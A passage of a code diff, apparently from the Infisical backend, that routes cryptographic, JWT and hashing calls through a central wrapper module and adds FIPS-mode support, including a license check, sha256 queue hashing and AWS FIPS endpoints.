@@ -499,7 +499,7 @@ export const signingService = (algorithm: AsymmetricKeyAlgorithm): TAsymmetricSi
   const generateAsymmetricPrivateKey = async () => {
     const { privateKey } = await new Promise<{ privateKey: string }>((resolve, reject) => {
       if (algorithm.startsWith("RSA")) {
-        crypto.generateKeyPair(
+        crypto.rawCrypto.generateKeyPair(
           "rsa",
           {
             modulusLength: Number(algorithm.split("_")[1]),
@@ -517,7 +517,7 @@ export const signingService = (algorithm: AsymmetricKeyAlgorithm): TAsymmetricSi
       } else {
         const { full: namedCurve } = $getEcCurveName(algorithm);
 
-        crypto.generateKeyPair(
+        crypto.rawCrypto.generateKeyPair(
           "ec",
           {
             namedCurve,
@@ -541,13 +541,13 @@ export const signingService = (algorithm: AsymmetricKeyAlgorithm): TAsymmetricSi
   };
 
   const getPublicKeyFromPrivateKey = (privateKey: Buffer) => {
-    const privateKeyObj = crypto.createPrivateKey({
+    const privateKeyObj = crypto.rawCrypto.createPrivateKey({
       key: privateKey,
       format: "pem",
       type: "pkcs8"
     });
 
-    const publicKey = crypto.createPublicKey(privateKeyObj).export({
+    const publicKey = crypto.rawCrypto.createPublicKey(privateKeyObj).export({
       type: "spki",
       format: "der"
     });

backend/src/lib/crypto/signing.ts

@@ -1,9 +1,11 @@
-import crypto, { KeyObject } from "crypto";
+import { KeyObject } from "crypto";
 import fs from "fs/promises";
 import path from "path";
 
+import { crypto } from "./cryptography";
+
 export const verifySignature = (data: string, signature: Buffer, publicKey: KeyObject) => {
-  const verify = crypto.createVerify("SHA256");
+  const verify = crypto.rawCrypto.createVerify("SHA256");
   verify.update(data);
   verify.end();
   return verify.verify(publicKey, signature);
@@ -12,7 +14,7 @@ export const verifySignature = (data: string, signature: Buffer, publicKey: KeyO
 export const verifyOfflineLicense = async (licenseContents: string, signature: string) => {
   const publicKeyPem = await fs.readFile(path.join(__dirname, "license_public_key.pem"), "utf8");
 
-  const publicKey = crypto.createPublicKey({
+  const publicKey = crypto.rawCrypto.createPublicKey({
     key: publicKeyPem,
     format: "pem",
     type: "pkcs1"

backend/src/lib/crypto/srp.ts

@@ -1,13 +1,10 @@
 import argon2 from "argon2";
-import crypto from "crypto";
 import jsrp from "jsrp";
-import nacl from "tweetnacl";
-import tweetnacl from "tweetnacl-util";
 
 import { TUserEncryptionKeys } from "@app/db/schemas";
 import { UserEncryption } from "@app/services/user/user-types";
 
-import { decryptSymmetric128BitHexKeyUTF8, encryptAsymmetric, encryptSymmetric } from "./encryption";
+import { crypto, SymmetricKeySize } from "./cryptography";
 
 export const generateSrpServerKey = async (salt: string, verifier: string) => {
   // eslint-disable-next-line new-cap
@@ -42,11 +39,10 @@ export const generateUserSrpKeys = async (
   password: string,
   customKeys?: { publicKey: string; privateKey: string }
 ) => {
-  const pair = nacl.box.keyPair();
+  const pair = await crypto.encryption().asymmetric().generateKeyPair();
-  const secretKeyUint8Array = pair.secretKey;
+
-  const publicKeyUint8Array = pair.publicKey;
+  const privateKey = customKeys?.privateKey || pair.privateKey;
-  const privateKey = customKeys?.privateKey || tweetnacl.encodeBase64(secretKeyUint8Array);
+  const publicKey = customKeys?.publicKey || pair.publicKey;
-  const publicKey = customKeys?.publicKey || tweetnacl.encodeBase64(publicKeyUint8Array);
 
   // eslint-disable-next-line
   const client = new jsrp.client();
@@ -78,7 +74,14 @@ export const generateUserSrpKeys = async (
     ciphertext: encryptedPrivateKey,
     iv: encryptedPrivateKeyIV,
     tag: encryptedPrivateKeyTag
-  } = encryptSymmetric(privateKey, key.toString("base64"));
+  } = crypto
+    .encryption()
+    .symmetric()
+    .encrypt({
+      plaintext: privateKey,
+      key: key.toString("base64"),
+      keySize: SymmetricKeySize.Bits256
+    });
 
   // create the protected key by encrypting the symmetric key
   // [key] with the derived key
@@ -86,7 +89,14 @@ export const generateUserSrpKeys = async (
     ciphertext: protectedKey,
     iv: protectedKeyIV,
     tag: protectedKeyTag
-  } = encryptSymmetric(key.toString("hex"), derivedKey.toString("base64"));
+  } = crypto
+    .encryption()
+    .symmetric()
+    .encrypt({
+      plaintext: key.toString("hex"),
+      key: derivedKey.toString("base64"),
+      keySize: SymmetricKeySize.Bits256
+    });
 
   return {
     protectedKey,
@@ -117,12 +127,16 @@ export const getUserPrivateKey = async (
   >
 ) => {
   if (user.encryptionVersion === UserEncryption.V1) {
-    return decryptSymmetric128BitHexKeyUTF8({
+    return crypto
-      ciphertext: user.encryptedPrivateKey,
+      .encryption()
-      iv: user.iv,
+      .symmetric()
-      tag: user.tag,
+      .decrypt({
-      key: password.slice(0, 32).padStart(32 + (password.slice(0, 32).length - new Blob([password]).size), "0")
+        ciphertext: user.encryptedPrivateKey,
-    });
+        iv: user.iv,
+        tag: user.tag,
+        key: password.slice(0, 32).padStart(32 + (password.slice(0, 32).length - new Blob([password]).size), "0"),
+        keySize: SymmetricKeySize.Bits128
+      });
   }
   if (
     user.encryptionVersion === UserEncryption.V2 &&
@@ -140,19 +154,24 @@ export const getUserPrivateKey = async (
       raw: true
     });
     if (!derivedKey) throw new Error("Failed to derive key from password");
-    const key = decryptSymmetric128BitHexKeyUTF8({
+    const key = crypto.encryption().symmetric().decrypt({
       ciphertext: user.protectedKey,
       iv: user.protectedKeyIV,
       tag: user.protectedKeyTag,
-      key: derivedKey
+      key: derivedKey,
+      keySize: SymmetricKeySize.Bits128
     });
 
-    const privateKey = decryptSymmetric128BitHexKeyUTF8({
+    const privateKey = crypto
-      ciphertext: user.encryptedPrivateKey,
+      .encryption()
-      iv: user.iv,
+      .symmetric()
-      tag: user.tag,
+      .decrypt({
-      key: Buffer.from(key, "hex")
+        ciphertext: user.encryptedPrivateKey,
-    });
+        iv: user.iv,
+        tag: user.tag,
+        key: Buffer.from(key, "hex"),
+        keySize: SymmetricKeySize.Bits128
+      });
     return privateKey;
   }
   throw new Error(`GetUserPrivateKey: Encryption version not found`);
@@ -160,6 +179,6 @@ export const getUserPrivateKey = async (
 
 export const buildUserProjectKey = async (privateKey: string, publickey: string) => {
   const randomBytes = crypto.randomBytes(16).toString("hex");
-  const { nonce, ciphertext } = encryptAsymmetric(randomBytes, publickey, privateKey);
+  const { nonce, ciphertext } = crypto.encryption().asymmetric().encrypt(randomBytes, publickey, privateKey);
   return { nonce, ciphertext };
 };

backend/src/lib/errors/index.ts

@@ -171,3 +171,15 @@ export class OidcAuthError extends Error {
     this.error = error;
   }
 }
+
+export class CryptographyError extends Error {
+  name: string;
+
+  error: unknown;
+
+  constructor({ name, error, message }: { message?: string; name?: string; error?: unknown }) {
+    super(message || "Cryptographic operation failed");
+    this.name = name || "CryptographyError";
+    this.error = error;
+  }
+}

backend/src/lib/files/files.ts

@@ -1,8 +1,8 @@
-import crypto from "crypto";
 import fs from "fs/promises";
 import os from "os";
 import path from "path";
 
+import { crypto } from "@app/lib/crypto/cryptography";
 import { logger } from "@app/lib/logger";
 
 const baseDir = path.join(os.tmpdir(), "infisical");

backend/src/lib/gateway/gateway.ts

@@ -1,11 +1,12 @@
 /* eslint-disable no-await-in-loop */
-import crypto from "node:crypto";
 import net from "node:net";
 
 import quicDefault, * as quicModule from "@infisical/quic";
 import axios from "axios";
 import https from "https";
 
+import { crypto } from "@app/lib/crypto/cryptography";
+
 import { BadRequestError } from "../errors";
 import { logger } from "../logger";
 import {
@@ -48,8 +49,8 @@ const createQuicConnection = async (
       verifyPeer: true,
       verifyCallback: async (certs) => {
         if (!certs || certs.length === 0) return quic.native.CryptoError.CertificateRequired;
-        const serverCertificate = new crypto.X509Certificate(Buffer.from(certs[0]));
+        const serverCertificate = new crypto.rawCrypto.X509Certificate(Buffer.from(certs[0]));
-        const caCertificate = new crypto.X509Certificate(tlsOptions.ca);
+        const caCertificate = new crypto.rawCrypto.X509Certificate(tlsOptions.ca);
         const isValidServerCertificate = serverCertificate.verify(caCertificate.publicKey);
         if (!isValidServerCertificate) return quic.native.CryptoError.BadCertificate;
 
@@ -72,7 +73,7 @@ const createQuicConnection = async (
     crypto: {
       ops: {
         randomBytes: async (data) => {
-          crypto.getRandomValues(new Uint8Array(data));
+          crypto.rawCrypto.getRandomValues(new Uint8Array(data));
         }
       }
     }

backend/src/lib/red-lock/index.ts

@@ -1,7 +1,7 @@
 /* eslint-disable */
 // Source code credits: https://github.com/mike-marcacci/node-redlock
 // Taken to avoid external dependency
-import { randomBytes, createHash } from "crypto";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { EventEmitter } from "events";
 
 // AbortController became available as a global in node version 16. Once version
@@ -251,14 +251,14 @@ export class Redlock extends EventEmitter {
    * Generate a sha1 hash compatible with redis evalsha.
    */
   private _hash(value: string): string {
-    return createHash("sha1").update(value).digest("hex");
+    return crypto.rawCrypto.createHash("sha1").update(value).digest("hex");
   }
 
   /**
    * Generate a cryptographically random string.
    */
   private _random(): string {
-    return randomBytes(16).toString("hex");
+    return crypto.randomBytes(16).toString("hex");
   }
 
   /**

backend/src/lib/telemetry/instrumentation.ts

@@ -9,7 +9,7 @@ import { ATTR_SERVICE_NAME, ATTR_SERVICE_VERSION } from "@opentelemetry/semantic
 import tracer from "dd-trace";
 import dotenv from "dotenv";
 
-import { initEnvConfig } from "../config/env";
+import { getTelemetryConfig } from "../config/env";
 
 dotenv.config();
 
@@ -75,28 +75,16 @@ const initTelemetryInstrumentation = ({
 };
 
 const setupTelemetry = () => {
-  const appCfg = initEnvConfig();
+  const appCfg = getTelemetryConfig();
 
-  if (appCfg.OTEL_TELEMETRY_COLLECTION_ENABLED) {
+  if (appCfg.useOtel) {
     console.log("Initializing telemetry instrumentation");
-    initTelemetryInstrumentation({
+    initTelemetryInstrumentation({ ...appCfg.OTEL });
-      otlpURL: appCfg.OTEL_EXPORT_OTLP_ENDPOINT,
-      otlpUser: appCfg.OTEL_COLLECTOR_BASIC_AUTH_USERNAME,
-      otlpPassword: appCfg.OTEL_COLLECTOR_BASIC_AUTH_PASSWORD,
-      otlpPushInterval: appCfg.OTEL_OTLP_PUSH_INTERVAL,
-      exportType: appCfg.OTEL_EXPORT_TYPE
-    });
   }
 
-  if (appCfg.SHOULD_USE_DATADOG_TRACER) {
+  if (appCfg.useDataDogTracer) {
     console.log("Initializing Datadog tracer");
-    tracer.init({
+    tracer.init({ ...appCfg.TRACER });
-      profiling: appCfg.DATADOG_PROFILING_ENABLED,
-      version: appCfg.INFISICAL_PLATFORM_VERSION,
-      env: appCfg.DATADOG_ENV,
-      service: appCfg.DATADOG_SERVICE,
-      hostname: appCfg.DATADOG_HOSTNAME
-    });
   }
 };
 

backend/src/lib/turn/credentials.ts

@@ -1,11 +1,11 @@
-import crypto from "node:crypto";
+import { crypto } from "@app/lib/crypto/cryptography";
 
 const TURN_TOKEN_TTL = 24 * 60 * 60 * 1000; // 24 hours in milliseconds
 export const getTurnCredentials = (id: string, authSecret: string, ttl = TURN_TOKEN_TTL) => {
   const timestamp = Math.floor((Date.now() + ttl) / 1000);
   const username = `${timestamp}:${id}`;
 
-  const hmac = crypto.createHmac("sha1", authSecret);
+  const hmac = crypto.rawCrypto.createHmac("sha1", authSecret);
   hmac.update(username);
   const password = hmac.digest("base64");
 

backend/src/main.ts

@@ -1,3 +1,5 @@
+// Note(Daniel): Do not rename this import, as it is strictly removed from FIPS standalone builds to avoid FIPS mode issues.
+// If you rename the import, update the Dockerfile.fips.standalone-infisical file as well.
 import "./lib/telemetry/instrumentation";
 
 import dotenv from "dotenv";
@@ -7,7 +9,7 @@ import { initializeHsmModule } from "@app/ee/services/hsm/hsm-fns";
 import { runMigrations } from "./auto-start-migrations";
 import { initAuditLogDbConnection, initDbConnection } from "./db";
 import { keyStoreFactory } from "./keystore/keystore";
-import { formatSmtpConfig, initEnvConfig } from "./lib/config/env";
+import { formatSmtpConfig, getDatabaseCredentials, initEnvConfig } from "./lib/config/env";
 import { buildRedisFromConfig } from "./lib/config/redis";
 import { removeTemporaryBaseDirectory } from "./lib/files";
 import { initLogger } from "./lib/logger";
@@ -15,24 +17,25 @@ import { queueServiceFactory } from "./queue";
 import { main } from "./server/app";
 import { bootstrapCheck } from "./server/boot-strap-check";
 import { smtpServiceFactory } from "./services/smtp/smtp-service";
+import { superAdminDALFactory } from "./services/super-admin/super-admin-dal";
 
 dotenv.config();
 
 const run = async () => {
   const logger = initLogger();
-  const envConfig = initEnvConfig(logger);
-
   await removeTemporaryBaseDirectory();
 
+  const databaseCredentials = getDatabaseCredentials(logger);
+
   const db = initDbConnection({
-    dbConnectionUri: envConfig.DB_CONNECTION_URI,
+    dbConnectionUri: databaseCredentials.dbConnectionUri,
-    dbRootCert: envConfig.DB_ROOT_CERT,
+    dbRootCert: databaseCredentials.dbRootCert,
-    readReplicas: envConfig.DB_READ_REPLICAS?.map((el) => ({
+    readReplicas: databaseCredentials.readReplicas
-      dbRootCert: el.DB_ROOT_CERT,
-      dbConnectionUri: el.DB_CONNECTION_URI
-    }))
   });
 
+  const superAdminDAL = superAdminDALFactory(db);
+  const envConfig = await initEnvConfig(superAdminDAL, logger);
+
   const auditLogDb = envConfig.AUDIT_LOGS_DB_CONNECTION_URI
     ? initAuditLogDbConnection({
         dbConnectionUri: envConfig.AUDIT_LOGS_DB_CONNECTION_URI,
@@ -60,6 +63,7 @@ const run = async () => {
   const server = await main({
     db,
     auditLogDb,
+    superAdminDAL,
     hsmModule: hsmModule.getModule(),
     smtp,
     logger,

backend/src/queue/queue-service.ts

@@ -18,6 +18,7 @@ import {
 } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-types";
 import { getConfig } from "@app/lib/config/env";
 import { buildRedisFromConfig, TRedisConfigKeys } from "@app/lib/config/redis";
+import { crypto } from "@app/lib/crypto";
 import { logger } from "@app/lib/logger";
 import { QueueWorkerProfile } from "@app/lib/types";
 import { CaType } from "@app/services/certificate-authority/certificate-authority-enums";
@@ -438,6 +439,14 @@ export const queueServiceFactory = (
 
     queueContainer[name] = new Queue(name as string, {
       ...queueSettings,
+      ...(crypto.isFipsModeEnabled()
+        ? {
+            settings: {
+              ...queueSettings?.settings,
+              repeatKeyHashAlgorithm: "sha256"
+            }
+          }
+        : {}),
       connection
     });
 
@@ -445,6 +454,14 @@ export const queueServiceFactory = (
     if (appCfg.QUEUE_WORKERS_ENABLED && isQueueEnabled(name)) {
       workerContainer[name] = new Worker(name, jobFn, {
         ...queueSettings,
+        ...(crypto.isFipsModeEnabled()
+          ? {
+              settings: {
+                ...queueSettings?.settings,
+                repeatKeyHashAlgorithm: "sha256"
+              }
+            }
+          : {}),
         connection
       });
     }

backend/src/server/app.ts

@@ -22,6 +22,7 @@ import { CustomLogger } from "@app/lib/logger/logger";
 import { alphaNumericNanoId } from "@app/lib/nanoid";
 import { TQueueServiceFactory } from "@app/queue";
 import { TSmtpService } from "@app/services/smtp/smtp-service";
+import { TSuperAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { globalRateLimiterCfg } from "./config/rateLimiter";
 import { addErrorsToResponseSchemas } from "./plugins/add-errors-to-response-schemas";
@@ -44,10 +45,22 @@ type TMain = {
   hsmModule: HsmModule;
   redis: Redis;
   envConfig: TEnvConfig;
+  superAdminDAL: TSuperAdminDALFactory;
 };
 
 // Run the server!
-export const main = async ({ db, hsmModule, auditLogDb, smtp, logger, queue, keyStore, redis, envConfig }: TMain) => {
+export const main = async ({
+  db,
+  hsmModule,
+  auditLogDb,
+  smtp,
+  logger,
+  queue,
+  keyStore,
+  redis,
+  envConfig,
+  superAdminDAL
+}: TMain) => {
   const appCfg = getConfig();
 
   const server = fastify({
@@ -128,7 +141,16 @@ export const main = async ({ db, hsmModule, auditLogDb, smtp, logger, queue, key
       })
     });
 
-    await server.register(registerRoutes, { smtp, queue, db, auditLogDb, keyStore, hsmModule, envConfig });
+    await server.register(registerRoutes, {
+      smtp,
+      queue,
+      db,
+      auditLogDb,
+      keyStore,
+      hsmModule,
+      envConfig,
+      superAdminDAL
+    });
 
     await server.register(registerServeUI, {
       standaloneMode: appCfg.STANDALONE_MODE || IS_PACKAGED,

backend/src/server/plugins/auth/inject-identity.ts

@@ -1,11 +1,12 @@
 import { requestContext } from "@fastify/request-context";
 import { FastifyRequest } from "fastify";
 import fp from "fastify-plugin";
-import jwt, { JwtPayload } from "jsonwebtoken";
+import type { JwtPayload } from "jsonwebtoken";
 
 import { TServiceTokens, TUsers } from "@app/db/schemas";
 import { TScimTokenJwtPayload } from "@app/ee/services/scim/scim-types";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto";
 import { BadRequestError } from "@app/lib/errors";
 import { ActorType, AuthMethod, AuthMode, AuthModeJwtTokenPayload, AuthTokenType } from "@app/services/auth/auth-type";
 import { TIdentityAccessTokenJwtPayload } from "@app/services/identity-access-token/identity-access-token-types";
@@ -72,7 +73,7 @@ const extractAuth = async (req: FastifyRequest, jwtSecret: string) => {
     } as const;
   }
 
-  const decodedToken = jwt.verify(authTokenValue, jwtSecret) as JwtPayload;
+  const decodedToken = crypto.jwt().verify(authTokenValue, jwtSecret) as JwtPayload;
 
   switch (decodedToken.authTokenType) {
     case AuthTokenType.ACCESS_TOKEN:

backend/src/server/plugins/error-handler.ts

@@ -7,6 +7,7 @@ import { ZodError } from "zod";
 import { getConfig } from "@app/lib/config/env";
 import {
   BadRequestError,
+  CryptographyError,
   DatabaseError,
   ForbiddenRequestError,
   GatewayTimeoutError,
@@ -147,6 +148,13 @@ export const fastifyErrHandler = fastifyPlugin(async (server: FastifyZodProvider
         message: error.message,
         error: error.name
       });
+    } else if (error instanceof CryptographyError) {
+      void res.status(HttpStatusCodes.BadRequest).send({
+        reqId: req.id,
+        statusCode: HttpStatusCodes.BadRequest,
+        message: error.message,
+        error: error.name
+      });
     } else if (error instanceof jwt.JsonWebTokenError) {
       let errorMessage = error.message;
 

backend/src/server/routes/index.ts

@@ -119,6 +119,7 @@ import { trustedIpDALFactory } from "@app/ee/services/trusted-ip/trusted-ip-dal"
 import { trustedIpServiceFactory } from "@app/ee/services/trusted-ip/trusted-ip-service";
 import { TKeyStoreFactory } from "@app/keystore/keystore";
 import { getConfig, TEnvConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { logger } from "@app/lib/logger";
 import { TQueueServiceFactory } from "@app/queue";
 import { readLimit } from "@app/server/config/rateLimiter";
@@ -278,7 +279,7 @@ import { slackIntegrationDALFactory } from "@app/services/slack/slack-integratio
 import { slackServiceFactory } from "@app/services/slack/slack-service";
 import { TSmtpService } from "@app/services/smtp/smtp-service";
 import { invalidateCacheQueueFactory } from "@app/services/super-admin/invalidate-cache-queue";
-import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
+import { TSuperAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 import { getServerCfg, superAdminServiceFactory } from "@app/services/super-admin/super-admin-service";
 import { telemetryDALFactory } from "@app/services/telemetry/telemetry-dal";
 import { telemetryQueueServiceFactory } from "@app/services/telemetry/telemetry-queue";
@@ -311,6 +312,7 @@ export const registerRoutes = async (
   server: FastifyZodProvider,
   {
     auditLogDb,
+    superAdminDAL,
     db,
     hsmModule,
     smtp: smtpService,
@@ -319,6 +321,7 @@ export const registerRoutes = async (
     envConfig
   }: {
     auditLogDb?: Knex;
+    superAdminDAL: TSuperAdminDALFactory;
     db: Knex;
     hsmModule: HsmModule;
     smtp: TSmtpService;
@@ -342,7 +345,6 @@ export const registerRoutes = async (
   const orgBotDAL = orgBotDALFactory(db);
   const incidentContactDAL = incidentContactDALFactory(db);
   const orgRoleDAL = orgRoleDALFactory(db);
-  const superAdminDAL = superAdminDALFactory(db);
   const rateLimitDAL = rateLimitDALFactory(db);
   const apiKeyDAL = apiKeyDALFactory(db);
 
@@ -1902,11 +1904,14 @@ export const registerRoutes = async (
     kmsService
   });
 
-  await superAdminService.initServerCfg();
-
   // setup the communication with license key server
   await licenseService.init();
 
+  // If FIPS is enabled, we check to ensure that the users license includes FIPS mode.
+  crypto.verifyFipsLicense(licenseService);
+
+  await superAdminService.initServerCfg();
+
   // Start HSM service if it's configured/enabled.
   await hsmService.startService();
 

backend/src/server/routes/v1/admin-router.ts

@@ -9,6 +9,7 @@ import {
   UsersSchema
 } from "@app/db/schemas";
 import { getConfig, overridableKeys } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError } from "@app/lib/errors";
 import { invalidateCacheLimit, readLimit, writeLimit } from "@app/server/config/rateLimiter";
 import { getTelemetryDistinctId } from "@app/server/lib/telemetry";
@@ -58,9 +59,11 @@ export const registerAdminRouter = async (server: FastifyZodProvider) => {
     handler: async () => {
       const config = await getServerCfg();
       const serverEnvs = getConfig();
+
       return {
         config: {
           ...config,
+          fipsEnabled: crypto.isFipsModeEnabled(),
           isMigrationModeOn: serverEnvs.MAINTENANCE_MODE,
           isSecretScanningDisabled: serverEnvs.DISABLE_SECRET_SCANNING,
           kubernetesAutoFetchServiceAccountToken: serverEnvs.KUBERNETES_AUTO_FETCH_SERVICE_ACCOUNT_TOKEN

backend/src/server/routes/v1/auth-router.ts

@@ -1,7 +1,7 @@
-import jwt from "jsonwebtoken";
 import { z } from "zod";
 
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto";
 import { getMinExpiresIn } from "@app/lib/fn";
 import { authRateLimit, writeLimit } from "@app/server/config/rateLimiter";
 import { verifyAuth } from "@app/server/plugins/auth/verify-auth";
@@ -93,7 +93,7 @@ export const registerAuthRoutes = async (server: FastifyZodProvider) => {
         }
       }
 
-      const token = jwt.sign(
+      const token = crypto.jwt().sign(
         {
           authMethod: decodedToken.authMethod,
           authTokenType: AuthTokenType.ACCESS_TOKEN,

backend/src/server/routes/v1/identity-tls-cert-auth-router.ts

@@ -1,11 +1,10 @@
-import crypto from "node:crypto";
-
 import { z } from "zod";
 
 import { IdentityTlsCertAuthsSchema } from "@app/db/schemas";
 import { EventType } from "@app/ee/services/audit-log/audit-log-types";
 import { ApiDocsTags, TLS_CERT_AUTH } from "@app/lib/api-docs";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError } from "@app/lib/errors";
 import { readLimit, writeLimit } from "@app/server/config/rateLimiter";
 import { verifyAuth } from "@app/server/plugins/auth/verify-auth";
@@ -28,9 +27,9 @@ const validateCaCertificate = (caCert: string) => {
   if (!caCert) return true;
   try {
     // eslint-disable-next-line no-new
-    new crypto.X509Certificate(caCert);
+    new crypto.rawCrypto.X509Certificate(caCert);
     return true;
-  } catch (err) {
+  } catch {
     return false;
   }
 };

backend/src/server/routes/v2/mfa-router.ts

@@ -1,7 +1,7 @@
-import jwt from "jsonwebtoken";
 import { z } from "zod";
 
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto";
 import { BadRequestError, NotFoundError } from "@app/lib/errors";
 import { mfaRateLimit } from "@app/server/config/rateLimiter";
 import { AuthModeMfaJwtTokenPayload, AuthTokenType, MfaMethod } from "@app/services/auth/auth-type";
@@ -23,7 +23,7 @@ export const registerMfaRouter = async (server: FastifyZodProvider) => {
       return res;
     }
 
-    const decodedToken = jwt.verify(token, cfg.AUTH_SECRET) as AuthModeMfaJwtTokenPayload;
+    const decodedToken = crypto.jwt().verify(token, cfg.AUTH_SECRET) as AuthModeMfaJwtTokenPayload;
     if (decodedToken.authTokenType !== AuthTokenType.MFA_TOKEN) throw new Error("Unauthorized access");
 
     const user = await server.store.user.findById(decodedToken.userId);

backend/src/services/api-key/api-key-service.ts

@@ -1,9 +1,6 @@
-import crypto from "node:crypto";
-
-import bcrypt from "bcrypt";
-
 import { TApiKeys } from "@app/db/schemas/api-keys";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { NotFoundError, UnauthorizedError } from "@app/lib/errors";
 
 import { TUserDALFactory } from "../user/user-dal";
@@ -27,7 +24,7 @@ export const apiKeyServiceFactory = ({ apiKeyDAL, userDAL }: TApiKeyServiceFacto
   const createApiKey = async (userId: string, name: string, expiresIn: number) => {
     const appCfg = getConfig();
     const secret = crypto.randomBytes(16).toString("hex");
-    const secretHash = await bcrypt.hash(secret, appCfg.SALT_ROUNDS);
+    const secretHash = await crypto.hashing().createHash(secret, appCfg.SALT_ROUNDS);
     const expiresAt = new Date();
     expiresAt.setSeconds(expiresAt.getSeconds() + expiresIn);
 
@@ -59,7 +56,7 @@ export const apiKeyServiceFactory = ({ apiKeyDAL, userDAL }: TApiKeyServiceFacto
       throw new UnauthorizedError();
     }
 
-    const isMatch = await bcrypt.compare(TOKEN_SECRET, apiKey.secretHash);
+    const isMatch = await crypto.hashing().compareHash(TOKEN_SECRET, apiKey.secretHash);
     if (!isMatch) throw new UnauthorizedError();
     await apiKeyDAL.updateById(apiKey.id, { lastUsed: new Date() });
     const user = await userDAL.findById(apiKey.userId);

backend/src/services/app-connection/app-connection-fns.ts

@@ -6,7 +6,7 @@ import {
 } from "@app/ee/services/app-connections/oci";
 import { getOracleDBConnectionListItem, OracleDBConnectionMethod } from "@app/ee/services/app-connections/oracledb";
 import { TLicenseServiceFactory } from "@app/ee/services/license/license-service";
-import { generateHash } from "@app/lib/crypto/encryption";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError } from "@app/lib/errors";
 import { APP_CONNECTION_NAME_MAP, APP_CONNECTION_PLAN_MAP } from "@app/services/app-connection/app-connection-maps";
 import {
@@ -305,7 +305,7 @@ export const decryptAppConnection = async (
       orgId: appConnection.orgId,
       kmsService
     }),
-    credentialsHash: generateHash(appConnection.encryptedCredentials)
+    credentialsHash: crypto.rawCrypto.createHash("sha256").update(appConnection.encryptedCredentials).digest("hex")
   } as TAppConnection;
 };
 

backend/src/services/app-connection/app-connection-service.ts

@@ -6,7 +6,7 @@ import { ValidateOracleDBConnectionCredentialsSchema } from "@app/ee/services/ap
 import { TLicenseServiceFactory } from "@app/ee/services/license/license-service";
 import { OrgPermissionAppConnectionActions, OrgPermissionSubjects } from "@app/ee/services/permission/org-permission";
 import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types";
-import { generateHash } from "@app/lib/crypto/encryption";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { DatabaseErrorCode } from "@app/lib/error-codes";
 import { BadRequestError, DatabaseError, NotFoundError } from "@app/lib/errors";
 import { DiscriminativePick, OrgServiceActor } from "@app/lib/types";
@@ -281,7 +281,7 @@ export const appConnectionServiceFactory = ({
 
       return {
         ...connection,
-        credentialsHash: generateHash(connection.encryptedCredentials),
+        credentialsHash: crypto.rawCrypto.createHash("sha256").update(connection.encryptedCredentials).digest("hex"),
         credentials: validatedCredentials
       } as TAppConnection;
     } catch (err) {

backend/src/services/app-connection/aws/aws-connection-fns.ts

@@ -1,9 +1,10 @@
 import { AssumeRoleCommand, STSClient } from "@aws-sdk/client-sts";
 import AWS from "aws-sdk";
 import { AxiosError } from "axios";
-import { randomUUID } from "crypto";
 
+import { CustomAWSHasher } from "@app/lib/aws/hashing";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError, InternalServerError } from "@app/lib/errors";
 import { logger } from "@app/lib/logger";
 import { AppConnection, AWSRegion } from "@app/services/app-connection/app-connection-enums";
@@ -35,6 +36,8 @@ export const getAwsConnectionConfig = async (appConnection: TAwsConnectionConfig
     case AwsConnectionMethod.AssumeRole: {
       const client = new STSClient({
         region,
+        useFipsEndpoint: crypto.isFipsModeEnabled(),
+        sha256: CustomAWSHasher,
         credentials:
           appCfg.INF_APP_CONNECTION_AWS_ACCESS_KEY_ID && appCfg.INF_APP_CONNECTION_AWS_SECRET_ACCESS_KEY
             ? {
@@ -46,7 +49,7 @@ export const getAwsConnectionConfig = async (appConnection: TAwsConnectionConfig
 
       const command = new AssumeRoleCommand({
         RoleArn: credentials.roleArn,
-        RoleSessionName: `infisical-app-connection-${randomUUID()}`,
+        RoleSessionName: `infisical-app-connection-${crypto.rawCrypto.randomUUID()}`,
         DurationSeconds: 900, // 15 mins
         ExternalId: orgId
       });

backend/src/services/auth-token/auth-token-service.ts

@@ -1,11 +1,8 @@
-import crypto from "node:crypto";
-
-import bcrypt from "bcrypt";
-import jwt from "jsonwebtoken";
 import { Knex } from "knex";
 
 import { TAuthTokens, TAuthTokenSessions } from "@app/db/schemas";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { ForbiddenRequestError, NotFoundError, UnauthorizedError } from "@app/lib/errors";
 import { TOrgMembershipDALFactory } from "@app/services/org-membership/org-membership-dal";
 
@@ -81,7 +78,7 @@ export const tokenServiceFactory = ({ tokenDAL, userDAL, orgMembershipDAL }: TAu
   const createTokenForUser = async ({ type, userId, orgId }: TCreateTokenForUserDTO) => {
     const { token, ...tkCfg } = getTokenConfig(type);
     const appCfg = getConfig();
-    const tokenHash = await bcrypt.hash(token, appCfg.SALT_ROUNDS);
+    const tokenHash = await crypto.hashing().createHash(token, appCfg.SALT_ROUNDS);
     await tokenDAL.transaction(async (tx) => {
       await tokenDAL.delete({ userId, type, orgId: orgId || null }, tx);
       const newToken = await tokenDAL.create(
@@ -115,7 +112,7 @@ export const tokenServiceFactory = ({ tokenDAL, userDAL, orgMembershipDAL }: TAu
       throw new Error("Token expired. Please try again");
     }
 
-    const isValidToken = await bcrypt.compare(code, token.tokenHash);
+    const isValidToken = await crypto.hashing().compareHash(code, token.tokenHash);
     if (!isValidToken) {
       if (token?.triesLeft) {
         if (token.triesLeft === 1) {
@@ -162,7 +159,7 @@ export const tokenServiceFactory = ({ tokenDAL, userDAL, orgMembershipDAL }: TAu
         message: "Failed to find refresh token"
       });
 
